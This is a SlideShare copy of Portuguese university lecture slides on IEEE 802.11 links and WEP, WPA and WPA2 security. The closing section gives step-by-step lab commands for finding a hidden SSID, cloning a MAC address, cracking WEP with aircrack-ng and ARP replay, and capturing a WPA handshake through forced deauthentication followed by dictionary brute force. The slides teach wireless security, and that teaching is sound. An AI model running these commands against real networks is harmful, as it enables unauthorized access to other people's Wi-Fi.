SlideShare ist ein Scribd-Unternehmen logo
1 von 86
Tecnologia em Redes de
              Computadores


Gerência de Redes


Prática de Ataques - wireless


Professor: André Peres
andre.peres@poa.ifrs.edu.br

Instituto Federal do Rio Grande do Sul - IFRS
Porto Alegre
Enlace IEEE 802.11
Existem 3 tipos de enlace
IBSS (Independent Basic Service Set) = ad-hoc

BSS (Basic Service Set)

ESS (Extended Service Set)
Enlace IEEE 802.11
IBSS ou ad-hoc
Criada de maneira espontânea
Área de abrangência pequena
Sem controle centralizado
Enlace IEEE 802.11
BSS
Controle centralizado (AP – Access Point)
    • Concentrador (hub) para rede sem fios
    • Comutador (switch) entre enlaces com/sem fio
    • Área de abrangência definida pelo AP
Enlace IEEE 802.11
ESS
Múltiplos BSSs
APs se comunicam via DS (distributed system)
Objetivo: roaming
Enlace IEEE 802.11
Ligação entre redes:
Pode utilizar BSS ou IBSS
Com BSS
    • Um AP
    • Dois APs (um é configurado como cliente)
Enlace IEEE 802.11
Nível de enlace IEEE 802.11
    Controle de comunicação de nível físico
    Baseado no padrão IEEE 802.3 (ethernet)
    Utiliza endereços MAC compatíveis com ethernet
    Controle de acesso ao meio: CSMA/CA
    Controle de erros tipo stop-and-wait
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Deve respeitar uma máquina de estados:
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Configuração da placa cliente
    • Tipo de rede (BSSType)
       – Ad-hoc
       – Infra estrutura (BSS)
       – Qualquer

    • Nome da rede (SSID)
       – Uma rede específica
       – Qualquer rede
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Configuração da placa cliente
    • Tipo de descoberta da rede (scan type)
       – Passivo → aguarda beacon frames
       – Ativo → utiliza probe request

    • Canal a ser utilizado (channel)
       – Especifica um canal 1 → 11
       – Qualquer canal (faz varredura de todos em busca da rede)
Enlace IEEE 802.11
Para conexão de uma estação com a rede
A estação deve “encontrar” a rede
    • O AP divulga sua existência através de beacon frames
Enlace IEEE 802.11
Para conexão de uma estação com a rede
  • Por segurança o AP pode não divulgar o nome da rede,
     obrigando a estação a utilizar probe request
Enlace IEEE 802.11
Para conexão de uma estação com a rede
  • O AP responde ao Probe Request com um Probe
     Response:
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Após a identificação do SSID e troca de mensagens
iniciais
    • Estado 1 → Não autenticado, Não associado
Passa-se para a fase de autenticação
    • Padrão inicial:
       – Open System
       – Shared Key (WEP)
    • Adicionados Posteriormente:
       – PSK - Pre-Shared Key (WPA, WPA2)
       – 802.1x (WEP, WPA, WPA2)
Enlace IEEE 802.11
Autenticação Open System
Autenticação nula
Qualquer estação é autenticada por padrão
Protocolo:
     1 → Estação envia uma requisição de autenticação
     2 → AP aceita a autenticação (sempre successfull)
Enlace IEEE 802.11
Autenticação Shared Key
Utiliza WEP com texto desafio
    • O WEP utiliza criptografia simétrica (chave única)
Enlace IEEE 802.11
Autenticação Pre-Shared Key
Similar ao Shared Key
A chave é utilizada apenas na autenticação
Autenticação 802.1x
Necessita de um servidor RADIUS
O AP serve como um NAS (Network Access Server)
A comunicação ocorre entre cliente e servidor RADIUS
O servidor RADIUS informa ao AP o resultado da
autenticação
Enlace IEEE 802.11
Para conexão de uma estação com a rede
Após a autenticação
    • Estado 2 → Autenticado, Não associado

Fase de associação
    • Passagem automática do estado 2 → 3
    • Estado 3 → Autenticado, Associado
    • Agora a estação pode receber/transmitir quadros de
       enlace na rede
    • Acesso ao servidor DHCP, etc...
Segurança IEEE 802.11
 A autenticação faz parte do processo de
segurança
Após a autenticação, a estação passa para o
estado de autenticado/associado
Somente neste estado, a estação pode trocar
quadros de enlace com a rede
Segurança IEEE 802.11
Criptografia
WEP (Wired Equivalent Privacy)
    • Baseia-se na dificuldade do atacante em obter um
       segredo compartilhado entre as estações
    • Utiliza criptografia simétrica
       – Mesma chave para cifragem e decifragem de quadros
    • Baseado no algoritmo RC4
       – Não é uma implementação pura do RC4
       – Foram feitas modificações...
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
Criptografia simétrica utilizando operações XOR
Necessita de uma chave com o mesmo tamanho da
mensagem (inviável)
Para contornar este problema utiliza o gerador de
números pseudo-aleatórios (PRNG) do RC4
Funcionamento: utiliza uma SEMENTE secreta para
gerar a chave de cifragem do mesmo tamanho da
mensagem
Segurança IEEE 802.11
WEP
A chave não pode ser reaproveitada em dois quadros

MSG [XOR] CIF → CHAVE

Se atacante insere ou conhece a mensagem original
e captura mensagem cifrada, obtém a chave utilizada
Segurança IEEE 802.11
WEP
Utilização de chave única → problema de sincronismo
!
Segurança IEEE 802.11
WEP
Necessária chave única, para cada quadro de enlace
Quadros de até 3000 bytes a 54 Mbps = muitas
chaves diferentes por segundo
Uma semente gera uma chave...
A mesma semente deve ser utilizada por todas as
estações
Segurança IEEE 802.11
WEP
Solução → utilização de um vetor de inicialização em
conjunto com a semente

IV (Initialization Vector) → 24 bits randômicos
    • Deve ser divulgado para a estação que irá decifrar o
       quadro
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
Segurança IEEE 802.11
WEP
O segredo permanece o mesmo, enquanto o IV é
alterado a cada quadro de enlace

IV → 24 bits

Segredo → 5 bytes → 40 bits = WEP64

Segredo → 13 bytes → 104 bits = WEP128
Segurança IEEE 802.11
Problemas do WEP
Utilização de chaves repetidas
IV → 24 bits → 224 combinações
Quadros de 1500 bytes a 11 Mbps
(1500 x 8 x 224) / (11 x 106)= 1800 segundos
Aproximadamente 5 horas
Excluindo possibilidade de 2 máquinas utilizarem o
mesmo IV.... .... ...
Segurança IEEE 802.11
Problemas do WEP
Os bits permanecem na mesma posição do quadro...
    • Se atacante deseja alterar um bit, basta inverter o seu
       valor
    • Além disso, deve identificar a alteração no CRC32
Se atacante captura uma chave, já pode gerar
pacotes falsos na rede utilizando esta chave/IV
Segurança IEEE 802.11
Problemas do WEP
Pesquisa de Fluhrer, Mantin, Shamir
     “Weaknesses in the key scheduling Algorithm of RC4”
Possíveis chaves fracas no PRNG do RC4
Ao utilizar uma chave fraca, identifica bits da semente
O WEP utiliza muitas sementes diferentes, gerando
muitas chaves fracas
Segurança IEEE 802.11
Problemas do WEP
Programas WEPCrack e AirSnort




    Total de pacotes: 2,5 milhões

                      Pacotes “interessantes”: 1878

                                         Segredo: xC513
Segurança IEEE 802.11
Problemas do WEP
Programas WEPCrack e AirSnort




  Total de pacotes: 7,3 milhões

                 Pacotes “interessantes”: 4160

                                  Segredo: xCd513ewq1pkm
Segurança IEEE 802.11
Problemas do WEP
Análise dos bits iniciais de uma mensagem cifrada
    • O LLC inclui sempre os mesmos bits: 0xaa

Inferir através de análise probabilística os bits da
semente (os primeiros bits são o IV)

Isto facilita a descoberta dos demais bits da semente
(segredo compartilhado)
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
Após descoberta das vulnerabilidades WEP
Criado grupo de trabalho IEEE 802.11i
    • Responsável pelo novo protocolo de segurança 802.11
    • Reuniões entre fabricantes e comunidade científica
Fornecedores preocupados
    •   Demora com 802.11i
    •   Criada Wi-Fi Alliance
    •   Necessidade de compatibilidade com hardware antigo
    •   Apenas atualização de firmware
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
Para manter o hardware → novo esquema rodando
sobre protocolo antigo (WEP)
Protocolo WPA (ano: 2002)
   • Mantém o WEP
   • Contém mecanismo de troca de segredo (parte da
      semente além do IV) periodicamente → TKIP
      (Temporal Key Integrity Protocol)
   • Permite autenticação via PSK ou 802.1x
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
MICHAEL
   • Substitui o CRC32 para verificação de integridade de
      mensagens
   • Gera um cálculo de 64 bits
   • Serve para impedir que um atacante consiga inserir
      quadros em uma rede cifrada
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
TKIP
       • Troca dinâmica de segredo
       • Necessita de um novo mecanismo de autenticação
       • Como o segredo é trocado, não pode utilizar a chave dinâmica
           como autenticação (o cliente não conhece a chave)
PSK (Pre-Shared Key)
       • Chave “mestra” utilizada no processo de autenticação
       • Utilizada inicialmente para ingresso na rede
       • Após autenticação, estação recebe a chave que está sendo
          utilizada pelas demais estações na rede
Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
PSK (Pre-Shared Key)
   • É o ponto pelo qual um atacante tenta obter acesso à
      rede
   • Atacante captura processo de autenticação e tenta
      identificar a PSK utilizada neste processo
   • Ao obter a PSK, consegue entrar na rede
   • Como o número de quadros trocados na autenticação é
      pequeno, o ataque deve ser baseado em força bruta
   • Força bruta → dicionário de senhas + software de
      análise da autenticação WPA
Segurança IEEE 802.11
WPA + 802.1x
  • Alternativa ao PSK
  • Não possui chave inicial
  • Usuário deve se autenticar com servidor RADIUS
     – PEAP (usuário/senha)
     – Certificado
     – …
  • Necessário servidor RADIUS
  • AP serve como ponte entre estação e RADIUS
Segurança IEEE 802.11
802.1x
  • Baseado no conceito de “portas”
     – Enquanto a estação não finaliza o processo de autenticação fica com a
         “porta” para a rede fechada
     – A única comunicação permitida é com o servidor RADIUS
     – Apenas no final da autenticação com sucesso (indicada pelo servidor
         RADIUS para o AP) o AP libera o acesso
  • Processo de autenticação ocorre no nível de enlace
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
Segurança IEEE 802.11
802.1x
  • No caso de uso de certificados, apenas quem possui
     certificado válido (CA) pode acessar a rede
  • No caso de EAP, verificado usuário/senha
     – Possibilidade de força bruta
  • O AP é autenticado junto ao RADIUS, impedindo AP
     falso
  • Possibilidade de ataques com AP+RADIUS falsos
     – Atacante realiza a autenticação do cliente
     – Não funciona com TLS (autenticação mútua AP ↔ Estação) via
         certificados
Segurança IEEE 802.11
WPA2 (IEEE 802.11i)
Ano: 2004
Substituição total do protocolo criptográfico
Utilização do AES(Advanced Encryption Standard)
    • Robusto
    • Sem ataques à criptografia conhecidos
    • Padrão de criptografia adotado por diversos
       softwares/equipamentos
Incompatível com equipamentos anteriores
Autenticação via PSK e 802.1x, Criptografia AES
Segurança IEEE 802.11
Na prática
WEP → fora !
Usuário doméstico/SOHO:
    • Equipamentos antigos ( → 2004): WPA/PSK
    • Equipamentos novos (2004 → ): WPA2/PSK
Usuário empresarial:
    • Equipamentos antigos ( → 2004) : WPA/802.1x
    • Equipamentos novos (2004 → ) : WPA2/802.1x
Ataques
Visão do atacante:
1. criptografia
nenhuma
WEP
WPA
WPA-2
Ataques
Visão do atacante:
2. autenticação
nenhuma
shared-key
PSK
802.1x
Ataques
Visão do atacante:
3. mecanismos adicionais
nenhum
Filtro MAC
SSID escondido
Mecanismos layer 3 (firewall, etc...)
Ataques
Cenários de testes:
1 – AP com SSID escondido e filtro de MAC
Ataque: captura de probes + clonagem de
MAC
2 – WEP
Ataque: quebra do WEP via software
3 – WPA
Ataque: desconexão de um cliente + captura
de autenticação + força bruta
Ataques
1 – AP com SSID escondido e filtro de MAC
Ataque: captura de probes + clonagem de
MAC
Passos:
Descoberta do SSID:

- colocar a placa de redes sem fios em modo
monitor
- capturar tráfego via wireshark, tcpdump,
etc....
Ataques
1 – AP com SSID escondido e filtro de MAC
Configurando o AP
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o nome da rede:
# ip l s wlan0 down
# iwconfig wlan0 mode monitor
# iwconfig wlan0 channel 8
# ip l s wlan0 up



Executar o wireshark e aguardar os “probes”
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o nome da rede:
Ataques
1 – AP com SSID escondido e filtro de MAC
Buscar por pacotes de probe (OK)
Buscar pelo MAC address de uma estação que
está navegando
Identificar faixa de endereços IP utilizados e
buscar por um IP que não está sendo usado
Objetivo:
Mesmo MAC, IP diferente....
Ataques
1 – AP com SSID escondido e filtro de MAC
Configurando o AP
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o MAC de uma estação da rede:

- placa em modo monitor
- wireshark...
Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o MAC de uma estação da rede:
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
  Atacante     Alvo


     ...         ...
                                        AP

  10.1.1.1    10.1.1.2                  IP

   AA:AA      AA:AA            MAC           MAC

   Físico      Físico          Físico        Físico
Ataques
1 – AP com SSID escondido e filtro de MAC
                        Alvo envia um quadro
Clonagem de MAC:       AP verifica MAC origem
  Atacante       Alvo                          OK !

     ...           ...
                                                            AP

  10.1.1.1     10.1.1.2                                     IP

   AA:AA        AA:AA                              MAC           MAC

   Físico       Físico                             Físico        Físico


               MAC D | MAC O |   IP O   |   IP D
                                                            OK !

                11:11 AA:AA 10.1.1.2 200.1.1.1
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
  Atacante     Alvo                       Volta a resposta

     ...         ...
                                                          AP

  10.1.1.1    10.1.1.2                                    IP

   AA:AA      AA:AA                              MAC           MAC

   Físico      Físico                            Físico        Físico


             MAC D | MAC O |   IP O   |   IP D
              AA:AA 11:11 200.1.1.1 10.1.12
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:           As duas placas de
  Atacante      Alvo                           rede aceitam...
                                           e repassam para o IP

     ...          ...
                                                            AP

  10.1.1.1     10.1.1.2                                     IP

   AA:AA       AA:AA                               MAC           MAC

   Físico       Físico                             Físico        Físico


              MAC D | MAC O |   IP O   |    IP D
               AA:AA 11:11 200.1.1.1 10.1.12
Ataques
                                          IP destino = 10.1.1.1?
1 – AP com SSID escondido e filtro de MAC         NÃO !
                                           Eu sou um roteador?
Clonagem de MAC:                                  NÃO !
  Atacante     Alvo                       → descarta o pacote !!!

     ...         ...
                                                            AP

  10.1.1.1    10.1.1.2                                      IP

   AA:AA      AA:AA                                MAC           MAC

   Físico      Físico                              Físico        Físico


             MAC D | MAC O |   IP O   |     IP D
              AA:AA 11:11 200.1.1.1 10.1.12
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
Ou seja...
Duas máquinas com mesmo MAC e IP's
diferentes podem “navegar” simultaneamente
(layer3)

… afinal é possível ter uma máquina com mais
de um IP vinculado na mesma placa de rede....
Ataques
 1 – AP com SSID escondido e filtro de MAC
 Clonagem de MAC e associação com AP:
 # killall nm-applet
 # ip l s wlan0 down
 # ip l s wlan0 address 00:1b:77:b9:51:49
 # ip a a 10.1.0.200/24 dev wlan0
 # ip l s wlan0 up
 # iwconfig wlan0 essid sectest ap 00:1c:f0:63:a8:7e channel 8

# tail -f /var/log/syslog
---------------------------------
kernel: [ 225.723137] wlan0: waiting for beacon from 00:1c:f0:63:a8:7e
kernel: [ 225.757365] wlan0: beacon received
kernel: [ 225.783319] wlan0: associate with 00:1c:f0:63:a8:7e (try 1)
kernel: [ 225.785939] wlan0: RX AssocResp from 00:1c:f0:63:a8:7e (capab=0x401
status=0 aid=1)
kernel: [ 225.785943] wlan0: associated
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC e associação com AP:
- não utilizar o serviço de DHCP...
- configurar na mão:
→ roteador default
→ servidor de DNS
Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC e associação com AP:
Ataques
2 – Quebra de WEP via software
Vulnerabilidade – PRNG do RC4 gerando
chaves fracas...
Técnica:
1. captura de pacotes cifrados com diferentes
IVs
2. análise dos pacotes (software) para
obtenção do segredo compartilhado
Ataques
2 – Quebra de WEP via software
Passos:
1. colocar a placa de rede em modo monitor
para captura do tráfego cifrado:
# ip l s wlan0 down
# iwconfig wlan0 mode monitor
# iwconfig wlan0 channel 8
# ip l s wlan0 up
Ataques
2 – Quebra de WEP via software
Passos:
2. instalação do software aircrack-ng
# apt-get install aircrack-ng


3. captura do tráfego (descoberta das redes)

# airodump-ng wlan0
Ataques
  2 – Quebra de WEP via software
  Passos:
  4. em outro terminal – captura do tráfego
  cifrado de uma rede específica para posterior
  análise
# airodump-ng --channel 8 --bssid 00:1C:F0:63:A8:7E -w wep1
wlan0

  5. para diminuir tempo, geração de tráfego
  (requisição de autenticação com o AP)
# aireplay-ng -1 0 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62
wlan0
Ataques
 2 – Quebra de WEP via software
 Passos:
 6. captura da requisição de autenticação (os
 pacotes ARP) e repetição dos mesmos para
 geração de mais tráfego
# aireplay-ng -3 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62
wlan0

 7. Após obter um número significativo de
 pacotes, tentar a análise...
 # aircrack-ng -b 00:1C:F0:63:A8:7E wep1-01.cap
Ataques
2 – Quebra de WEP via software

Obs: necessário grande volume de tráfego
para análise...
porém, com tráfego suficiente, sempre se
consegue o segredo compartilhado
Ataques
3 – Quebra de WPA via software
Vulnerabilidade:
Mesmo protocolo de autenticação do WEP
quando utilizado PSK

Técnica:
Obtenção dos quadros de associação e
posterior força bruta na PSK
Ataques
  3 – Quebra de WPA via software
  Passos:
  1. colocar a placa de rede em modo monitor
  2. monitorar com airodump-ng
  3. captura de pacotes cifrados (especificar
  WPA)
# airodump-ng --channel 8 -w wpa --bssid 00:1C:F0:63:A8:7E -w wpa1 wlan0
Ataques
 3 – Quebra de WPA via software
 Passos:
 4. força a desautenticação de um cliente para
 captura dos quadros de autenticação (falsifica
 mensagem de desaut. do AP)
# aireplay-ng -0 5 -a 00:1C:F0:63:A8:7E wlan0

 5. utiliza força bruta (dicionário) para tentar
 obter PSK
 # aircrack-ng -w dicionario.txt wpa1-01.cap

Weitere ähnliche Inhalte

Was ist angesagt?

How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngOpen Knowledge Nepal
 
802.11n Tutorial
802.11n Tutorial802.11n Tutorial
802.11n Tutorialgopinathkn
 
Curso de VoIP / Parte 01: VoIP y Asterisk
Curso de VoIP / Parte 01: VoIP y AsteriskCurso de VoIP / Parte 01: VoIP y Asterisk
Curso de VoIP / Parte 01: VoIP y AsteriskIrontec
 
Ssl in a nutshell
Ssl in a nutshellSsl in a nutshell
Ssl in a nutshellFrank Kelly
 
CNIT 141 8. Authenticated Encryption
CNIT 141 8. Authenticated EncryptionCNIT 141 8. Authenticated Encryption
CNIT 141 8. Authenticated EncryptionSam Bowne
 
Configuring GRE Tunnel Through a Cisco ASA Firewall
Configuring GRE Tunnel Through a Cisco ASA FirewallConfiguring GRE Tunnel Through a Cisco ASA Firewall
Configuring GRE Tunnel Through a Cisco ASA FirewallHarris Andrea
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
Ssl Vpn presentation at CoolTech club
Ssl Vpn presentation at CoolTech clubSsl Vpn presentation at CoolTech club
Ssl Vpn presentation at CoolTech clubiplotnikov
 
Configurar snmp en cisco
Configurar snmp en ciscoConfigurar snmp en cisco
Configurar snmp en ciscochulver
 
Switching: VLANs y VTP
Switching: VLANs y VTPSwitching: VLANs y VTP
Switching: VLANs y VTPRamón RS
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksGreg Foss
 
Encrypting emails using Kleopatra PGP
Encrypting emails using Kleopatra PGPEncrypting emails using Kleopatra PGP
Encrypting emails using Kleopatra PGPLupu Cosmin
 

Was ist angesagt? (20)

How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ng
 
802.11n Tutorial
802.11n Tutorial802.11n Tutorial
802.11n Tutorial
 
Curso de VoIP / Parte 01: VoIP y Asterisk
Curso de VoIP / Parte 01: VoIP y AsteriskCurso de VoIP / Parte 01: VoIP y Asterisk
Curso de VoIP / Parte 01: VoIP y Asterisk
 
802.11w Tutorial
802.11w Tutorial802.11w Tutorial
802.11w Tutorial
 
Ssl in a nutshell
Ssl in a nutshellSsl in a nutshell
Ssl in a nutshell
 
SSL/TLS
SSL/TLSSSL/TLS
SSL/TLS
 
CNIT 141 8. Authenticated Encryption
CNIT 141 8. Authenticated EncryptionCNIT 141 8. Authenticated Encryption
CNIT 141 8. Authenticated Encryption
 
CCNP Security-Secure
CCNP Security-SecureCCNP Security-Secure
CCNP Security-Secure
 
Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi Hacking
 
Configuring GRE Tunnel Through a Cisco ASA Firewall
Configuring GRE Tunnel Through a Cisco ASA FirewallConfiguring GRE Tunnel Through a Cisco ASA Firewall
Configuring GRE Tunnel Through a Cisco ASA Firewall
 
WPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyWPA-3: SEA and Dragonfly
WPA-3: SEA and Dragonfly
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
Ssl Vpn presentation at CoolTech club
Ssl Vpn presentation at CoolTech clubSsl Vpn presentation at CoolTech club
Ssl Vpn presentation at CoolTech club
 
CCNP Security-Firewall
CCNP Security-FirewallCCNP Security-Firewall
CCNP Security-Firewall
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking
 
Configurar snmp en cisco
Configurar snmp en ciscoConfigurar snmp en cisco
Configurar snmp en cisco
 
Switching: VLANs y VTP
Switching: VLANs y VTPSwitching: VLANs y VTP
Switching: VLANs y VTP
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
 
Encrypting emails using Kleopatra PGP
Encrypting emails using Kleopatra PGPEncrypting emails using Kleopatra PGP
Encrypting emails using Kleopatra PGP
 

Ähnlich wie Ataque Redes Wireless - Prática de Ataques

Aula 8 - Redes sem fios - Segurança II
Aula 8 - Redes sem fios - Segurança IIAula 8 - Redes sem fios - Segurança II
Aula 8 - Redes sem fios - Segurança IIAndre Peres
 
06 - Redes sem Fios - seguranca
06 - Redes sem Fios -  seguranca06 - Redes sem Fios -  seguranca
06 - Redes sem Fios - segurancaAndre Peres
 
Vulnerabilidades em Redes Wifi
Vulnerabilidades em Redes WifiVulnerabilidades em Redes Wifi
Vulnerabilidades em Redes WifiDavid de Assis
 
Seguranca Wireless Instituto Online
Seguranca Wireless   Instituto OnlineSeguranca Wireless   Instituto Online
Seguranca Wireless Instituto Onlineinstonline
 
Wardriving
WardrivingWardriving
Wardrivingtecnotux
 
Aula 6 - Redes sem fios - Enlace
Aula 6 - Redes sem fios - EnlaceAula 6 - Redes sem fios - Enlace
Aula 6 - Redes sem fios - EnlaceAndre Peres
 
Segurança de redes wifi para computadores pessoais
Segurança de redes wifi para computadores pessoaisSegurança de redes wifi para computadores pessoais
Segurança de redes wifi para computadores pessoaisssuser906f55
 
Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11
Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11
Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11Aline Cruz
 
WiFi Security and QOS
WiFi Security and QOSWiFi Security and QOS
WiFi Security and QOSAndre_C10002
 
Um Mecanismo de Autenticação Baseado em ECDH para Redes
Um Mecanismo de Autenticação Baseado em ECDH para Redes Um Mecanismo de Autenticação Baseado em ECDH para Redes
Um Mecanismo de Autenticação Baseado em ECDH para Redes Eduardo Souza
 
225187571 mecanismos-de-seguranca
225187571 mecanismos-de-seguranca225187571 mecanismos-de-seguranca
225187571 mecanismos-de-segurancaMarco Guimarães
 
3 - Redes de Comutadores - ethernet wifi
3 - Redes de Comutadores -  ethernet wifi3 - Redes de Comutadores -  ethernet wifi
3 - Redes de Comutadores - ethernet wifiAndre Peres
 
Segurança nas redes wirelles rd ii av ii
Segurança nas redes wirelles rd ii av iiSegurança nas redes wirelles rd ii av ii
Segurança nas redes wirelles rd ii av iiMax Maia
 
Segurança nas redes wirelless
Segurança nas redes wirellessSegurança nas redes wirelless
Segurança nas redes wirellessMax Maia
 

Ähnlich wie Ataque Redes Wireless - Prática de Ataques (20)

Aula 8 - Redes sem fios - Segurança II
Aula 8 - Redes sem fios - Segurança IIAula 8 - Redes sem fios - Segurança II
Aula 8 - Redes sem fios - Segurança II
 
06 - Redes sem Fios - seguranca
06 - Redes sem Fios -  seguranca06 - Redes sem Fios -  seguranca
06 - Redes sem Fios - seguranca
 
Vulnerabilidades em Redes Wifi
Vulnerabilidades em Redes WifiVulnerabilidades em Redes Wifi
Vulnerabilidades em Redes Wifi
 
Seguranca Wireless Instituto Online
Seguranca Wireless   Instituto OnlineSeguranca Wireless   Instituto Online
Seguranca Wireless Instituto Online
 
Wardriving
WardrivingWardriving
Wardriving
 
Aula 6 - Redes sem fios - Enlace
Aula 6 - Redes sem fios - EnlaceAula 6 - Redes sem fios - Enlace
Aula 6 - Redes sem fios - Enlace
 
802.11i
802.11i802.11i
802.11i
 
Segurança de redes wifi para computadores pessoais
Segurança de redes wifi para computadores pessoaisSegurança de redes wifi para computadores pessoais
Segurança de redes wifi para computadores pessoais
 
Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11
Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11
Análise de Segurança dos Sistemas Criptográficos Utilizados em Redes IEEE 802.11
 
WiFi Security and QOS
WiFi Security and QOSWiFi Security and QOS
WiFi Security and QOS
 
Um Mecanismo de Autenticação Baseado em ECDH para Redes
Um Mecanismo de Autenticação Baseado em ECDH para Redes Um Mecanismo de Autenticação Baseado em ECDH para Redes
Um Mecanismo de Autenticação Baseado em ECDH para Redes
 
Segurança em redes sem fio
Segurança em redes sem fioSegurança em redes sem fio
Segurança em redes sem fio
 
225187571 mecanismos-de-seguranca
225187571 mecanismos-de-seguranca225187571 mecanismos-de-seguranca
225187571 mecanismos-de-seguranca
 
3 - Redes de Comutadores - ethernet wifi
3 - Redes de Comutadores -  ethernet wifi3 - Redes de Comutadores -  ethernet wifi
3 - Redes de Comutadores - ethernet wifi
 
Camada de enlace parte2
Camada de enlace   parte2Camada de enlace   parte2
Camada de enlace parte2
 
44 sockets[1]
44 sockets[1]44 sockets[1]
44 sockets[1]
 
Segurança de rede wi fi - WPA
Segurança de rede wi fi - WPASegurança de rede wi fi - WPA
Segurança de rede wi fi - WPA
 
Protocolos
ProtocolosProtocolos
Protocolos
 
Segurança nas redes wirelles rd ii av ii
Segurança nas redes wirelles rd ii av iiSegurança nas redes wirelles rd ii av ii
Segurança nas redes wirelles rd ii av ii
 
Segurança nas redes wirelless
Segurança nas redes wirellessSegurança nas redes wirelless
Segurança nas redes wirelless
 

Mehr von Andre Peres

04 - Redes sem Fios -fisico
04 - Redes sem Fios -fisico04 - Redes sem Fios -fisico
04 - Redes sem Fios -fisicoAndre Peres
 
05 - Redes sem Fios - enlace
05 - Redes sem Fios - enlace05 - Redes sem Fios - enlace
05 - Redes sem Fios - enlaceAndre Peres
 
03- Redes sem Fios - antenas
03- Redes sem Fios -  antenas03- Redes sem Fios -  antenas
03- Redes sem Fios - antenasAndre Peres
 
01 - Redes sem Fios - introducao
01 - Redes sem Fios -  introducao01 - Redes sem Fios -  introducao
01 - Redes sem Fios - introducaoAndre Peres
 
02 - Redes sem Fios - microondas
02 - Redes sem Fios - microondas02 - Redes sem Fios - microondas
02 - Redes sem Fios - microondasAndre Peres
 
10 - segurança -snmp
10  - segurança -snmp10  - segurança -snmp
10 - segurança -snmpAndre Peres
 
8 - segurança - anatomia ataques
8 - segurança - anatomia ataques8 - segurança - anatomia ataques
8 - segurança - anatomia ataquesAndre Peres
 
9 - segurança - ataques buffer-injection
9 - segurança -  ataques buffer-injection9 - segurança -  ataques buffer-injection
9 - segurança - ataques buffer-injectionAndre Peres
 
7 - segurança - dmz vpn
7  - segurança -  dmz vpn7  - segurança -  dmz vpn
7 - segurança - dmz vpnAndre Peres
 
6 - segurança - criptografia
6   - segurança - criptografia6   - segurança - criptografia
6 - segurança - criptografiaAndre Peres
 
5 - segurança - firewall
5  - segurança - firewall5  - segurança - firewall
5 - segurança - firewallAndre Peres
 
4 - segurança - mecanismos
4 - segurança - mecanismos4 - segurança - mecanismos
4 - segurança - mecanismosAndre Peres
 
3 - segurança - psi
3 - segurança - psi3 - segurança - psi
3 - segurança - psiAndre Peres
 
2 - segurança - analise de-riscos
2 - segurança - analise de-riscos2 - segurança - analise de-riscos
2 - segurança - analise de-riscosAndre Peres
 
1 - Segurança - introducao
1 - Segurança - introducao1 - Segurança - introducao
1 - Segurança - introducaoAndre Peres
 
7 - Redes de Computadores - codificacao sinalizacao-multiplexacao
7 - Redes de Computadores - codificacao sinalizacao-multiplexacao7 - Redes de Computadores - codificacao sinalizacao-multiplexacao
7 - Redes de Computadores - codificacao sinalizacao-multiplexacaoAndre Peres
 
6 - Redes de Computadores - meios transmissao
6 - Redes de Computadores - meios transmissao6 - Redes de Computadores - meios transmissao
6 - Redes de Computadores - meios transmissaoAndre Peres
 
5 - Redes de Computadores - fr-atm-mpls
5 - Redes de Computadores - fr-atm-mpls 5 - Redes de Computadores - fr-atm-mpls
5 - Redes de Computadores - fr-atm-mpls Andre Peres
 
4 - Redes de Computadores - arp-vlan-equips
4 - Redes de Computadores - arp-vlan-equips4 - Redes de Computadores - arp-vlan-equips
